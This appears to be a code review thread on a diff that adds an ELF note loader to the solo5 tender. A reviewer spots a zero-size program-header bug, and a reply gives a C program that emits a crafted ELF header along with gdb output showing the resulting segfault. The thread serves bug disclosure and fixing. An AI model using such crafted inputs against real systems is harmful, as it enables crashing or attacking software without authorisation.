tenders/common/elf.c

```diff
@@ -235,3 +221,119 @@ void elf_load(const char *file, uint8_t *mem, size_t mem_size,
         close (fd_kernel);
     exit(1);
 }
+
+void elf_load_mft(const char *file, struct mft **mft, size_t *mft_size)
+{
+    int fd_kernel = -1;
+    ssize_t nbytes;
+    size_t ph_size;
+    Elf64_Off ph_off;
+    Elf64_Half ph_entsz;
+    Elf64_Half ph_cnt;
+    Elf64_Half ph_i;
+    Elf64_Phdr *phdr = NULL;
+    Elf64_Ehdr hdr;
+    struct mft *note = NULL;
+    size_t note_offset, note_size = 0;
+
+    fd_kernel = open(file, O_RDONLY);
+    if (fd_kernel == -1)
+        goto out_error;
+
+    nbytes = pread_in_full(fd_kernel, &hdr, sizeof(Elf64_Ehdr), 0);
+    if (nbytes < 0)
+        goto out_error;
+    if (nbytes != sizeof(Elf64_Ehdr))
+        goto out_invalid;
+    if (!ehdr_is_valid(&hdr))
+        goto out_invalid;
+
+    ph_off = hdr.e_phoff;
+    ph_entsz = hdr.e_phentsize;
+    ph_cnt = hdr.e_phnum;
+    ph_size = ph_entsz * ph_cnt;
+    phdr = malloc(ph_size);
```

Comment:
- Depending on `malloc` implementation (with my `glibc` this works), I think this could succeed with these params (unless I'm missing something else):
```c
ph_entsz = 0;
ph_cnt = 10; /* well, >0 */
ph_size = ph_entsz * ph_cnt;
/* a.k.a. */ ph_size = 0 * 10;
phdr = malloc(0); /* returns non-NULL handle */

nbytes = pread_in_full(fd, phdr, 0, ph_off);
/* returns 0. is there a use case for reading 0 bytes from a file? */

if (0 < 0) goto out_error; /* it's not < 0*/
if (0 != 0) goto out_invalid; /* it is 0 */

for (ph_i = 0; ph_i < ph_cnt /* 10 */; ph_i++) {
  if (phdr[ph_i].p_type != PT_NOTE) /* here we are off into uninitialized memory? */
}
```

Reply:
```c
#include <stdbool.h>
#include <stdint.h>
#include <stdlib.h>
#include <stdio.h>
#include <elf.h>
int
main(){
  Elf64_Ehdr hdr;

  /* make ehdr_is_valid happy: */
  hdr.e_ident[EI_MAG0] = ELFMAG0;
  hdr.e_ident[EI_MAG1] = ELFMAG1;
  hdr.e_ident[EI_MAG2] = ELFMAG2;
  hdr.e_ident[EI_MAG3] = ELFMAG3;
  hdr.e_ident[EI_CLASS] = ELFCLASS64;
  hdr.e_type = ET_EXEC;
  hdr.e_machine = EM_X86_64;

  /* set ph params */
  hdr.e_phoff = 0;
  hdr.e_phentsize = 0;
  hdr.e_phnum = 0xffff; /* as many as possible to get a segfault */

  for(size_t i = 0; i < sizeof(Elf64_Ehdr); i++){
    printf("%c", ((char *)&hdr)[i]);
  }
};
```

```shell
~/c/solo5 gcc trigger.c > /dev/shm/trigger.elf
~/c/solo5 ./tenders/hvt/solo5-hvt /dev/shm/trigger.elf
Segmentation fault
~/c/solo5 gdb --args ./tenders/hvt/solo5-hvt-debug /dev/shm/trigger.elf
GNU gdb (Debian 8.2.1-2) 8.2.1
This GDB was configured as "x86_64-linux-gnu".
Reading symbols from ./tenders/hvt/solo5-hvt-debug...done.
(gdb) run
Starting program: /home/user/c/solo5/tenders/hvt/solo5-hvt-debug /dev/shm/trigger.elf

Program received signal SIGSEGV, Segmentation fault.
elf_load_mft (file=0x7fffffffe3eb "/dev/shm/trigger.elf", mft=0x7fffffffdec0, mft_size=0x7fffffffdec8) at common/elf.c:269
269	        if (phdr[ph_i].p_type != PT_NOTE)
(gdb) 
```